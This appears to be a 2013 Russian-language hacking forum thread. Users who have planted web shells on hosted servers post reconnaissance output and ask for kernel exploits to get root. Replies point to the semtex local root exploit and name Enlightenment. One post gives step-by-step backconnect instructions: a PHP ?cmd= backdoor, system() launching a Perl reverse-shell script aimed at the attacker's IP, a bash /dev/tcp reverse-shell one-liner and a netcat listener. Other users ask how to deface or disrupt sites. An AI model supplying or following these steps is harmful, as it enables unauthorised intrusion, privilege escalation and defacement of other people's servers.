Linux version 2.6.18-308.4.1.el5 (mockbuild@hs20-bc2-4.build.redhat.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-52)) #1 SMP Wed Mar 28 01:54:56 EDT 2012

$ cat /proc/sys/vm/mmap_min_addr
4096

$ pwd
/data/plays

$ ls -la /usr/bin/staprun
пусто

dean999

23.07.2013, 18:40

Добрый день, нужна помощь.

$ uname -a
Linux 2.6.32-16-pve #1 SMP Fri Nov 9 11:42:51 CET 2012 i686 i686 i386 GNU/Linux
$ id
uid=48(apache) gid=48(apache) groups=48(apache),500(kurdishnews),502(mobile-m),503(textil-india),505(promotionsite),...

После ввода Id выводит всех пользователей, можно ли как то воспользоваться их правами? или тока апачем?

Может кто то Exploit посоветует?

warhamer2012

24.07.2013, 16:19

Мужики, объясните, что делать с шеллом, если он не хочет исполнять команды ОС? Мне нужно "пошатать" один сайт, залился, а доступ к командной строке не могу получить.

Что можно сделать в плане шатания трубы сайту?

termigor

27.07.2013, 04:53

Прошу Вашей помощи

Доброго времени суток. Подскажите пожалуйста, можно ли как-нибудь повысить права? Ниже характеристики сервера

uname -a

Code:
Linux vip-48 3.1.10-vip-47 #2 SMP Fri Jan 27 13:50:40 MSK 2012 i686 Intel(R) Xeon(R) CPU E5606 @ 2.13GHz GenuineIntel GNU/Linux

ls -la /boot

ls -la --full-time /lib/lib*

mount

Code:
/dev/sda1 on / type ext3 (rw,noatime)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
udev on /dev type tmpfs (rw,nosuid,relatime,size=10240k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620)
/dev/sda3 on /tmp type ext3 (rw,noexec,nosuid,nodev,noatime)
/dev/sda4 on /home type ext3 (rw,nosuid,noatime,usrquota)
none on /dev/shm type tmpfs (rw,noexec,nosuid,nodev)
/dev/sdb1 on /mnt/backup type ext3 (rw,nosuid,noatime)

df -h

Code:
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 13G 7.5G 4.2G 65% /
udev 10M 64K 10M 1% /dev
/dev/sda3 2.0G 84M 1.8G 5% /tmp
/dev/sda4 259G 68G 178G 28% /home
none 6.0G 4.0K 6.0G 1% /dev/shm
/dev/sdb1 917G 123G 747G 15% /mnt/backup

cat /etc/issue

Code:
This is \n.\O (\s \m \r) \t

cat /etc/crontab

Code:
# for vixie cron
#
# $Header: /var/cvsroot/gentoo-x86/sys-process/vixie-cron/files/crontab-3.0.1-r4,v 1.1 2005/03/04 23:59:48 ciaranm Exp $
#
#

# Global variables
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# check scripts in cron.hourly, cron.daily, cron.weekly and cron.monthly
0 * * * * root rm -f /var/spool/cron/lastrun/cron.hourly
1 3 * * * root rm -f /var/spool/cron/lastrun/cron.daily
15 4 * * 6 root rm -f /var/spool/cron/lastrun/cron.weekly
30 5 1 * * root rm -f /var/spool/cron/lastrun/cron.monthly
*/10 * * * * root test -x /usr/sbin/run-crons && /usr/sbin/run-crons

cat /proc/version

Code:
Linux version 3.1.10-vip-47 (root@vip-48) (gcc version 4.4.3 (Gentoo 4.4.3-r2 p1.2) ) #2 SMP Fri Jan 27 13:50:40 MSK 2012

cat /proc/sys/vm/mmap_min_addr

Code:
4096

pwd

Code:
/home/*/*******.ru/*******.ru/public_html/test

ls -la /usr/bin/staprun

Unknown

28.07.2013, 15:02

termigor

http://dl.packetstormsecurity.net/1305-exploits/semtex.c

компилить с -O2

termigor

29.07.2013, 20:10

2Hummer,

большое спасибо, что откликнулись. Но сегодня зайдя на сервер, узнал, что сервер поменяли. Теперь пишет, что сервер "Linux vip-48 2.6.39-NX.23-vip-47 #2 SMP Mon Oct 17 14:45:43 MSD 2011". В шапке темы написано, что это сервера Spaceweb и что их порутать почти невозможно. Но может быть все-таки есть что-то для этой сборки?

esshka2

04.08.2013, 02:41

Тут как-то можно привилегии повысить?

OS Version : Microsoft Windows NT 6.0.6002 Service Pack 2 - IIS Version : Microsoft-IIS/7.0

sfinxs

13.08.2013, 14:34

Привет . Есть вопрос про шелл . Вообшем залил шелл пробую закинуть какой нибудь пхп файл . пишет : ERROR cant c hmod 0777 . То есть надо как то присвоить права администратора или как обойти ето?

sfinxs

14.08.2013, 09:17

может есть где туториал по тому как с помошью netcat подключится к шеллу c99 и ПОВЫСИТь права на корневую папку админа чтобы можно было INDEX.HTML поменять?

OxoTnik

14.08.2013, 09:56

у тебя должен быть прямой IP адрес без nat

Открываешь у себя порт например 44444 на netcat (-l -p 44444), затем делаешь бекконнект например через пёрл скрипт

(Залил сюда http://rghost.ru/48103670)

Закинь вместе с шелом бекдор например такой

Затем открываешь бекдор ?cmd=phpinfo(); проверяешь сработало?! идём дальше

вместо phpinfo(); делаешь запрос

.php?cmd=
system("perl /путь до скрипта/back.pl твой ip куда конектиться 44444(порт)");

Пример

.php?cmd=
system("perl /var/www/data/back.pl 192.168.1.1 44444");

Ну и раз начал как варианты

system('/bin/bash -i > /dev/tcp/ip/порт 0&1');

на сервере биндим порт 31377
со своего ПК nc -v IP хоста 31337

П.С. Просто не помню функционал с99))

SergioBlog

03.09.2013, 17:31

Подскажите есть что под ядро?

Linux 2.6.32-358.6.2.el6.centos.plus.x86_64 #1 SMP Thu May 16 17:43:34 UTC 2013 x86_64

$ ls -la /boot
total 107203
dr-xr-xr-x. 5 root root 4096 Jun 11 00:10 .
dr-xr-xr-x. 25 root root 4096 Aug 16 17:42 ..
-rw-r--r-- 1 root root 183 Oct 17 2012 .vmlinuz-2.6.32-279.11.1.el6.centos.plus.x86_64.hmac
-rw-r--r-- 1 root root 183 Nov 7 2012 .vmlinuz-2.6.32-279.14.1.el6.centos.plus.x86_64.hmac
-rw-r--r-- 1 root root 183 Dec 19 2012 .vmlinuz-2.6.32-279.19.1.el6.centos.plus.x86_64.hmac
-rw-r--r-- 1 root root 170 Aug 24 2012 .vmlinuz-2.6.32-279.5.2.el6.x86_64.hmac
-rw-r--r-- 1 root root 182 May 16 21:08 .vmlinuz-2.6.32-358.6.2.el6.centos.plus.x86_64.hmac
-rw-r--r-- 1 root root 2350374 Oct 17 2012 System.map-2.6.32-279.11.1.el6.centos.plus.x86_64
-rw-r--r-- 1 root root 2350408 Nov 7 2012 System.map-2.6.32-279.14.1.el6.centos.plus.x86_64
-rw-r--r-- 1 root root 2349835 Dec 19 2012 System.map-2.6.32-279.19.1.el6.centos.plus.x86_64
-rw-r--r-- 1 root root 2341963 Aug 24 2012 System.map-2.6.32-279.5.2.el6.x86_64
-rw-r--r-- 1 root root 2416357 May 16 21:08 System.map-2.6.32-358.6.2.el6.centos.plus.x86_64
-rw-r--r-- 1 root root 102950 Oct 17 2012 config-2.6.32-279.11.1.el6.centos.plus.x86_64
-rw-r--r-- 1 root root 102950 Nov 7 2012 config-2.6.32-279.14.1.el6.centos.plus.x86_64
-rw-r--r-- 1 root root 102939 Dec 19 2012 config-2.6.32-279.19.1.el6.centos.plus.x86_64
-rw-r--r-- 1 root root 101976 Aug 24 2012 config-2.6.32-279.5.2.el6.x86_64
-rw-r--r-- 1 root root 104678 May 16 21:08 config-2.6.32-358.6.2.el6.centos.plus.x86_64
drwxr-xr-x. 3 root root 1024 Apr 17 2012 efi
drwxr-xr-x. 2 root root 1024 Jun 11 00:11 grub
-rw-r--r-- 1 root root 15267486 Oct 22 2012 initramfs-2.6.32-279.11.1.el6.centos.plus.x86_64.img
-rw-r--r-- 1 root root 15270624 Dec 17 2012 initramfs-2.6.32-279.14.1.el6.centos.plus.x86_64.img
-rw-r--r-- 1 root root 15166273 Dec 27 2012 initramfs-2.6.32-279.19.1.el6.centos.plus.x86_64.img
-rw-r--r-- 1 root root 14843210 Sep 5 2012 initramfs-2.6.32-279.5.2.el6.x86_64.img
-rw-r--r-- 1 root root 15468576 Jun 11 00:11 initramfs-2.6.32-358.6.2.el6.centos.plus.x86_64.img
drwx------. 2 root root 12288 Apr 17 2012 lost+found
-rw-r--r-- 1 root root 181610 Oct 17 2012 symvers-2.6.32-279.11.1.el6.centos.plus.x86_64.gz
-rw-r--r-- 1 root root 181587 Nov 7 2012 symvers-2.6.32-279.14.1.el6.centos.plus.x86_64.gz
-rw-r--r-- 1 root root 181670 Dec 19 2012 symvers-2.6.32-279.19.1.el6.centos.plus.x86_64.gz
-rw-r--r-- 1 root root 179204 Aug 24 2012 symvers-2.6.32-279.5.2.el6.x86_64.gz
-rw-r--r-- 1 root root 186117 May 16 21:09 symvers-2.6.32-358.6.2.el6.centos.plus.x86_64.gz
-rwxr-xr-x 1 root root 4006256 Oct 17 2012 vmlinuz-2.6.32-279.11.1.el6.centos.plus.x86_64
-rwxr-xr-x 1 root root 4007504 Nov 7 2012 vmlinuz-2.6.32-279.14.1.el6.centos.plus.x86_64
-rwxr-xr-x 1 root root 3960816 Dec 19 2012 vmlinuz-2.6.32-279.19.1.el6.centos.plus.x86_64
-rwxr-xr-x 1 root root 3987216 Aug 24 2012 vmlinuz-2.6.32-279.5.2.el6.x86_64
-rwxr-xr-x 1 root root 4064464 May 16 21:08 vmlinuz-2.6.32-358.6.2.el6.centos.plus.x86_64

$ ls -la --full-time /lib/lib*
-rwxr-xr-x 1 root root 7220 2013-02-21 14:48:30.000000000 +0200 /lib/libBrokenLocale-2.12.so
lrwxrwxrwx 1 root root 23 2013-06-11 00:04:49.768113317 +0300 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.12.so
-rwxr-xr-x 1 root root 20372 2013-02-21 14:48:29.000000000 +0200 /lib/libSegFault.so
-rwxr-xr-x 1 root root 13412 2013-02-21 14:48:29.000000000 +0200 /lib/libanl-2.12.so
lrwxrwxrwx 1 root root 14 2013-06-11 00:04:49.772112208 +0300 /lib/libanl.so.1 -> libanl-2.12.so
-rwxr-xr-x 1 root root 1902708 2013-02-21 14:48:30.000000000 +0200 /lib/libc-2.12.so
lrwxrwxrwx 1 root root 12 2013-06-11 00:04:49.908113450 +0300 /lib/libc.so.6 -> libc-2.12.so
-rwxr-xr-x 1 root root 190988 2013-02-21 14:48:29.000000000 +0200 /lib/libcidn-2.12.so
lrwxrwxrwx 1 root root 15 2013-06-11 00:04:49.919112886 +0300 /lib/libcidn.so.1 -> libcidn-2.12.so
lrwxrwxrwx 1 root root 17 2013-07-03 11:48:30.051519001 +0300 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 13836 2013-06-25 11:49:25.000000000 +0300 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 38376 2013-02-21 14:48:29.000000000 +0200 /lib/libcrypt-2.12.so
lrwxrwxrwx 1 root root 16 2013-06-11 00:04:49.925113300 +0300 /lib/libcrypt.so.1 -> libcrypt-2.12.so
-rwxr-xr-x 1 root root 17892 2013-02-21 14:48:29.000000000 +0200 /lib/libdl-2.12.so
lrwxrwxrwx 1 root root 13 2013-06-11 00:04:49.933112356 +0300 /lib/libdl.so.2 -> libdl-2.12.so
-rw-r--r--. 1 root root 478 2011-12-08 02:24:02.000000000 +0200 /lib/libfreebl3.chk
-rwxr-xr-x. 1 root root 300676 2011-12-08 02:24:02.000000000 +0200 /lib/libfreebl3.so
-rwxr-xr-x 1 root root 120672 2013-02-21 14:54:42.000000000 +0200 /lib/libgcc_s-4.4.7-20120601.so.1
lrwxrwxrwx 1 root root 28 2013-06-11 00:05:02.267117800 +0300 /lib/libgcc_s.so.1 -> libgcc_s-4.4.7-20120601.so.1
lrwxrwxrwx 1 root root 21 2013-05-16 15:42:57.641109461 +0300 /lib/libgssapi_krb5.so.2 -> libgssapi_krb5.so.2.2
-rwxr-xr-x 1 root root 262124 2013-04-16 21:57:30.000000000 +0300 /lib/libgssapi_krb5.so.2.2
lrwxrwxrwx 1 root root 16 2013-05-16 15:42:57.751107627 +0300 /lib/libgssrpc.so.4 -> libgssrpc.so.4.1
-rwxr-xr-x 1 root root 121300 2013-04-16 21:57:30.000000000 +0300 /lib/libgssrpc.so.4.1
lrwxrwxrwx 1 root root 18 2013-05-16 15:42:57.796103783 +0300 /lib/libk5crypto.so.3 -> libk5crypto.so.3.1
-rwxr-xr-x 1 root root 169712 2013-04-16 21:57:30.000000000 +0300 /lib/libk5crypto.so.3.1
lrwxrwxrwx 1 root root 18 2013-05-16 15:42:53.843346091 +0300 /lib/libkeyutils.so.1 -> libkeyutils.so.1.3
-rwxr-xr-x 1 root root 9536 2012-06-22 09:20:01.000000000 +0300 /lib/libkeyutils.so.1.3
lrwxrwxrwx 1 root root 14 2013-05-16 15:42:57.863114261 +0300 /lib/libkrb5.so.3 -> libkrb5.so.3.3
-rwxr-xr-x 1 root root 901552 2013-04-16 21:57:30.000000000 +0300 /lib/libkrb5.so.3.3
lrwxrwxrwx 1 root root 21 2013-05-16 15:42:58.194362223 +0300 /lib/libkrb5support.so.0 -> libkrb5support.so.0.1
-rwxr-xr-x 1 root root 42716 2013-04-16 21:57:30.000000000 +0300 /lib/libkrb5support.so.0.1
-rwxr-xr-x 1 root root 200024 2013-02-21 14:48:30.000000000 +0200 /lib/libm-2.12.so
lrwxrwxrwx 1 root root 12 2013-06-11 00:04:49.947113051 +0300 /lib/libm.so.6 -> libm-2.12.so
-rwxr-xr-x 1 root root 113908 2013-02-21 14:48:30.000000000 +0200 /lib/libnsl-2.12.so
lrwxrwxrwx 1 root root 14 2013-06-11 00:04:49.955112595 +0300 /lib/libnsl.so.1 -> libnsl-2.12.so
lrwxrwxrwx 1 root root 22 2013-08-07 14:59:02.679531001 +0300 /lib/libnss_centrifydc.so.0 -> libnss_centrifydc.so.2
-rwxr-xr-x 1 root root 182691 2013-07-05 20:15:26.000000000 +0300 /lib/libnss_centrifydc.so.2
-rwxr-xr-x 1 root root 40196 2013-02-21 14:48:30.000000000 +0200 /lib/libnss_compat-2.12.so
lrwxrwxrwx 1 root root 21 2013-06-11 00:04:49.959113780 +0300 /lib/libnss_compat.so.2 -> libnss_compat-2.12.so
-rwxr-xr-x 1 root root 25592 2013-02-21 14:48:30.000000000 +0200 /lib/libnss_dns-2.12.so
lrwxrwxrwx 1 root root 18 2013-06-11 00:04:49.962115326 +0300 /lib/libnss_dns.so.2 -> libnss_dns-2.12.so
-rwxr-xr-x 1 root root 58704 2013-02-21 14:48:29.000000000 +0200 /lib/libnss_files-2.12.so
lrwxrwxrwx 1 root root 20 2013-06-11 00:04:49.966111657 +0300 /lib/libnss_files.so.2 -> libnss_files-2.12.so
-rwxr-xr-x 1 root root 22136 2013-02-21 14:48:29.000000000 +0200 /lib/libnss_hesiod-2.12.so
lrwxrwxrwx 1 root root 21 2013-06-11 00:04:49.975111179 +0300 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.12.so
-rwxr-xr-x 1 root root 49708 2013-02-21 14:48:29.000000000 +0200 /lib/libnss_nis-2.12.so
lrwxrwxrwx 1 root root 18 2013-06-11 00:04:49.979112845 +0300 /lib/libnss_nis.so.2 -> libnss_nis-2.12.so
-rwxr-xr-x 1 root root 58708 2013-02-21 14:48:29.000000000 +0200 /lib/libnss_nisplus-2.12.so
lrwxrwxrwx 1 root root 22 2013-06-11 00:04:49.983112845 +0300 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.12.so
-rwxr-xr-x 1 root root 131080 2013-02-21 14:48:30.000000000 +0200 /lib/libpthread-2.12.so
lrwxrwxrwx 1 root root 18 2013-06-11 00:04:49.994112247 +0300 /lib/libpthread.so.0 -> libpthread-2.12.so
-rwxr-xr-x 1 root root 103384 2013-02-21 14:48:29.000000000 +0200 /lib/libresolv-2.12.so
lrwxrwxrwx 1 root root 17 2013-06-11 00:04:50.002111847 +0300 /lib/libresolv.so.2 -> libresolv-2.12.so
-rwxr-xr-x 1 root root 39676 2013-02-21 14:48:29.000000000 +0200 /lib/librt-2.12.so
lrwxrwxrwx 1 root root 13 2013-06-11 00:04:50.005112652 +0300 /lib/librt.so.1 -> librt-2.12.so
-rwxr-xr-x 1 root root 120780 2013-05-10 12:05:31.000000000 +0300 /lib/libselinux.so.1
-rwxr-xr-x 1 root root 31616 2013-02-21 14:48:30.000000000 +0200 /lib/libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2013-06-11 00:04:50.008117855 +0300 /lib/libthread_db.so.1 -> libthread_db-1.0.so
-rwxr-xr-x 1 root root 12788 2013-02-21 14:48:29.000000000 +0200 /lib/libutil-2.12.so
lrwxrwxrwx 1 root root 15 2013-06-11 00:04:50.016133967 +0300 /lib/libutil.so.1 -> libutil-2.12.so
lrwxrwxrwx 1 root root 13 2013-06-11 00:05:01.559116890 +0300 /lib/libz.so.1 -> libz.so.1.2.3
-rwxr-xr-x 1 root root 75384 2013-02-22 01:01:21.000000000 +0200 /lib/libz.so.1.2.3

$ mount
/dev/mapper/vg_webhotel1-lv_root on / type ext4 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/xvda1 on /boot type ext3 (rw)
/dev/mapper/web-vhosts on /var/www/vhosts type ext4 (rw,noatime)
/dev/mapper/web-logs on /var/log/httpd type ext4 (rw,noatime)
/dev/mapper/web-mysql2 on /var/lib/mysql type ext3 (rw,noatime)
/dev/mapper/web-pgsql on /var/lib/pgsql/data type ext4 (rw,noatime)
/dev/mapper/psa-dumps on /var/lib/psa/dumps type ext4 (rw,noatime)
/dev/mapper/psa-session on /var/lib/php type xfs (rw,noatime)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
none on /proc/xen type xenfs (rw)
/etc/named on /var/named/chroot/etc/named type none (rw,bind)
/var/named on /var/named/chroot/var/named type none (rw,bind)
/etc/named.rfc1912.zones on /var/named/chroot/etc/named.rfc1912.zones type none (rw,bind)
/usr/lib64/bind on /var/named/chroot/usr/lib64/bind type none (rw,bind)
/etc/named.iscdlv.key on /var/named/chroot/etc/named.iscdlv.key type none (rw,bind)
/dev/mapper/psa-pagespeed on /var/cache/pagespeed type ext3 (rw,noatime)

$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg_webhotel1-lv_root
7.2G 5.9G 963M 87% /
tmpfs 15G 0 15G 0% /dev/shm
/dev/xvda1 485M 116M 344M 26% /boot
/dev/mapper/web-vhosts
192G 141G 42G 78% /var/www/vhosts
/dev/mapper/web-logs 20G 603M 19G 4% /var/log/httpd
/dev/mapper/web-mysql2
20G 265M 19G 2% /var/lib/mysql
/dev/mapper/psa-dumps
50G 32G 16G 67% /var/lib/psa/dumps
/dev/mapper/psa-session
5.0G 2.5G 2.6G 49% /var/lib/php
/dev/mapper/psa-pagespeed
30G 241M 28G 1% /var/cache/pagespeed

$ cat /etc/issue
CentOS release 6.4 (Final)
Kernel \r on an \m

$ cat /etc/crontabcat
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

$ cat /proc/version
Linux version 2.6.32-358.6.2.el6.centos.plus.x86_64 (mockbuild@c6b9.bsys.dev.centos.org) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Thu May 16 17:43:34 UTC 2013

$ cat /proc/sys/vm/mmap_min_addr

4096

$ ls -la /usr/bin/staprun

yeti2

13.10.2013, 02:25

Всем привет , я уже не знаю где написать вопрос свой. Везде удаляют

Коротко , проскаил я nmap сайт и вот . что выдало

PORT STATE SERVICE VERSION
21/tcp open tcpwrapped
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
445/tcp open netbios-ssn
3306/tcp open mysql MySQL 5.1.68-community
3389/tcp open ms-wbt-server Microsoft Terminal Service
9003/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9998/tcp open http SmarterTools httpd 2.0.3636.24141 (ASP.NET 2.0.50727)
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC

Running: Microsoft Windows Vista|7|2008
OS CPE: cpe:/o:microsoft:windows_vista::sp2 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008
OS details: Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)

http://clip2net.com/clip/m75327/1381613073-clip-13kb.png

В чем проблема?

sfinxs15

04.12.2013, 21:38

может знает кто експлоит для етой машины ? и как его заливать?

Linux webserver 2.6.26-2-amd64 #1 SMP Thu Nov 5 02:23:12 UTC 2009 x86_64 GNU/Linux

BigBear

05.12.2013, 11:40

sfinxs15 said:
может знает кто експлоит для етой машины ? и как его заливать?
Linux webserver 2.6.26-2-amd64 #1 SMP Thu Nov 5 02:23:12 UTC 2009 x86_64 GNU/Linux

Enlightment должен взять. Ядро старое, как раз для него.

N2013

07.12.2013, 17:40

подскажите пожалуйста есть под него сплойтик ?

Linux 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:22:04 EDT 2011 x86_64

$ ls -la /boot

total 12088

drwxr-xr-x 4 root root 1024 Jun 17 2011 .

drwxr-xr-x 23 root root 4096 Oct 18 15:40 ..

-rw-r--r-- 1 root root 163 May 31 2011 .vmlinuz-2.6.18-238.12.1.el5.hmac

-rw-r--r-- 1 root root 1188481 Jan 21 2009 System.map-2.6.18-128.el5

-rw-r--r-- 1 root root 1261015 May 31 2011 System.map-2.6.18-238.12.1.el5

-rw-r--r-- 1 root root 64994 Jan 21 2009 config-2.6.18-128.el5

-rw-r--r-- 1 root root 67215 May 31 2011 config-2.6.18-238.12.1.el5

drwxr-xr-x 2 root root 1024 Jun 17 2011 grub

-rw------- 1 root root 2672666 Feb 2 2010 initrd-2.6.18-128.el5.img

-rw------- 1 root root 2742814 Jun 17 2011 initrd-2.6.18-238.12.1.el5.img

drwx------ 2 root root 12288 Feb 2 2010 lost+found

-rw-r--r-- 1 root root 80032 Mar 16 2009 message

-rw-r--r-- 1 root root 102182 Jan 21 2009 symvers-2.6.18-128.el5.gz

-rw-r--r-- 1 root root 113923 May 31 2011 symvers-2.6.18-238.12.1.el5.gz

-rw-r--r-- 1 root root 1889308 Jan 21 2009 vmlinuz-2.6.18-128.el5

-rw-r--r-- 1 root root 2096156 May 31 2011 vmlinuz-2.6.18-238.12.1.el5

$ ls -la --full-time /lib/libc*

-rwxr-xr-x 1 root root 1689728 2012-03-20 03:41:43.000000000 +0200 /lib/libc-2.5.so

lrwxrwxrwx 1 root root 11 2012-04-01 21:08:33.000000000 +0200 /lib/libc.so.6 -> libc-2.5.so

lrwxrwxrwx 1 root root 14 2010-02-02 01:53:08.000000000 +0200 /lib/libcap.so.1 -> libcap.so.1.10

-rwxr-xr-x 1 root root 11560 2007-03-14 20:15:10.000000000 +0200 /lib/libcap.so.1.10

-rwxr-xr-x 1 root root 191708 2012-03-20 03:41:43.000000000 +0200 /lib/libcidn-2.5.so

lrwxrwxrwx 1 root root 14 2012-04-01 21:08:33.000000000 +0200 /lib/libcidn.so.1 -> libcidn-2.5.so

lrwxrwxrwx 1 root root 17 2011-06-17 15:59:15.000000000 +0200 /lib/libcom_err.so.2 -> libcom_err.so.2.1

-rwxr-xr-x 1 root root 6300 2010-11-11 20:39:52.000000000 +0200 /lib/libcom_err.so.2.1

-rwxr-xr-x 1 root root 45432 2012-03-20 03:41:44.000000000 +0200 /lib/libcrypt-2.5.so

lrwxrwxrwx 1 root root 15 2012-04-01 21:08:33.000000000 +0200 /lib/libcrypt.so.1 -> libcrypt-2.5.so

-rwxr-xr-x 1 root root 1296128 2012-03-28 02:00:31.000000000 +0200 /lib/libcrypto.so.0.9.8e

lrwxrwxrwx 1 root root 19 2012-04-01 21:08:37.000000000 +0200 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e

$ mount

/dev/mapper/isw_hgcjccia_Volume0p3 on / type ext3 (rw)

proc on /proc type proc (rw)

sysfs on /sys type sysfs (rw)

devpts on /dev/pts type devpts (rw,gid=5,mode=620)

/dev/mapper/isw_hgcjccia_Volume0p1 on /boot type ext3 (rw)

tmpfs on /dev/shm type tmpfs (rw)

none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

tmpfs on /usr/local/psa/handlers/before-local type tmpfs (rw)

tmpfs on /usr/local/psa/handlers/before-queue type tmpfs (rw)

tmpfs on /usr/local/psa/handlers/before-remote type tmpfs (rw)

tmpfs on /usr/local/psa/handlers/info type tmpfs (rw)

tmpfs on /usr/local/psa/handlers/spool type tmpfs (rw,mode=0770,uid=2021,gid=31)

$ cat /etc/issue

CentOS release 5.6 (Final)

Kernel \r on an \m

$ cat /etc/crontab

SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root

HOME=/

# run-parts

01 * * * * root run-parts /etc/cron.hourly

02 4 * * * root run-parts /etc/cron.daily

22 4 * * 0 root run-parts /etc/cron.weekly

42 4 1 * * root run-parts /etc/cron.monthly

$ cat /proc/version

Linux version 2.6.18-238.12.1.el5 (mockbuild@builder10.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-50)) #1 SMP Tue May 31 13:22:04 EDT 2011

$ cat /proc/sys/vm/mmap_min_addr

4096

er9j6@

11.12.2013, 19:14

Подскажите что есть под ядро?

Linux 2.6.32-279.14.1.el6.x86_64 #1 SMP Tue Nov 6 23:43:09 UTC 2012 x86_64

$ ls -la /boot
total 101500
dr-xr-xr-x 5 root root 4096 Oct 28 10:33 .
drwxr-xr-x 25 root root 4096 Oct 13 21:35 ..
-rw-r--r-- 1 root root 171 Nov 7 2012 .vmlinuz-2.6.32-279.14.1.el6.x86_64.hmac
-rw-r--r-- 1 root root 171 Jun 12 05:59 .vmlinuz-2.6.32-358.11.1.el6.x86_64.hmac
-rw-r--r-- 1 root root 171 Jul 17 02:15 .vmlinuz-2.6.32-358.14.1.el6.x86_64.hmac
-rw-r--r-- 1 root root 171 Aug 28 19:43 .vmlinuz-2.6.32-358.18.1.el6.x86_64.hmac
-rw-r--r-- 1 root root 171 Oct 16 21:01 .vmlinuz-2.6.32-358.23.2.el6.x86_64.hmac
-rw-r--r-- 1 root root 2342277 Nov 7 2012 System.map-2.6.32-279.14.1.el6.x86_64
-rw-r--r-- 1 root root 2407976 Jun 12 05:59 System.map-2.6.32-358.11.1.el6.x86_64
-rw-r--r-- 1 root root 2408392 Jul 17 02:15 System.map-2.6.32-358.14.1.el6.x86_64
-rw-r--r-- 1 root root 2408641 Aug 28 19:43 System.map-2.6.32-358.18.1.el6.x86_64
-rw-r--r-- 1 root root 2408974 Oct 16 21:01 System.map-2.6.32-358.23.2.el6.x86_64
lrwxrwxrwx 1 root root 1 Dec 1 2012 boot -> .
-rw-r--r-- 1 root root 101977 Nov 7 2012 config-2.6.32-279.14.1.el6.x86_64
-rw-r--r-- 1 root root 104086 Jun 12 05:59 config-2.6.32-358.11.1.el6.x86_64
-rw-r--r-- 1 root root 104086 Jul 17 02:15 config-2.6.32-358.14.1.el6.x86_64
-rw-r--r-- 1 root root 104112 Aug 28 19:43 config-2.6.32-358.18.1.el6.x86_64
-rw-r--r-- 1 root root 104112 Oct 16 21:01 config-2.6.32-358.23.2.el6.x86_64
drwxr-xr-x 3 root root 4096 Jul 11 2011 efi
drwxr-xr-x 2 root root 4096 Oct 28 10:33 grub
-rw-r--r-- 1 root root 13833759 Dec 1 2012 initramfs-2.6.32-279.14.1.el6.x86_64.img
-rw-r--r-- 1 root root 14053551 Jun 13 10:04 initramfs-2.6.32-358.11.1.el6.x86_64.img
-rw-r--r-- 1 root root 14054856 Jul 18 10:40 initramfs-2.6.32-358.14.1.el6.x86_64.img
-rw-r--r-- 1 root root 14057425 Sep 13 11:08 initramfs-2.6.32-358.18.1.el6.x86_64.img
-rw-r--r-- 1 root root 14059954 Oct 28 10:33 initramfs-2.6.32-358.23.2.el6.x86_64.img
drwx------ 2 root root 16384 Jul 11 2011 lost+found
-rw-r--r-- 1 root root 179184 Nov 7 2012 symvers-2.6.32-279.14.1.el6.x86_64.gz
-rw-r--r-- 1 root root 185867 Jun 12 05:59 symvers-2.6.32-358.11.1.el6.x86_64.gz
-rw-r--r-- 1 root root 185902 Jul 17 02:16 symvers-2.6.32-358.14.1.el6.x86_64.gz
-rw-r--r-- 1 root root 185949 Aug 28 19:44 symvers-2.6.32-358.18.1.el6.x86_64.gz
-rw-r--r-- 1 root root 185978 Oct 16 21:02 symvers-2.6.32-358.23.2.el6.x86_64.gz
-rwxr-xr-x 1 root root 3988752 Nov 7 2012 vmlinuz-2.6.32-279.14.1.el6.x86_64
-rwxr-xr-x 1 root root 4046224 Jun 12 05:59 vmlinuz-2.6.32-358.11.1.el6.x86_64
-rwxr-xr-x 1 root root 4045680 Jul 17 02:15 vmlinuz-2.6.32-358.14.1.el6.x86_64
-rwxr-xr-x 1 root root 4046224 Aug 28 19:43 vmlinuz-2.6.32-358.18.1.el6.x86_64
-rwxr-xr-x 1 root root 4047152 Oct 16 21:01 vmlinuz-2.6.32-358.23.2.el6.x86_64

$ mount
/dev/md2 on / type ext4 (rw)
proc on /proc type proc (rw)
none on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/md1 on /boot type ext3 (rw)
/dev/md3 on /home type ext4 (rw,grpquota,usrquota)
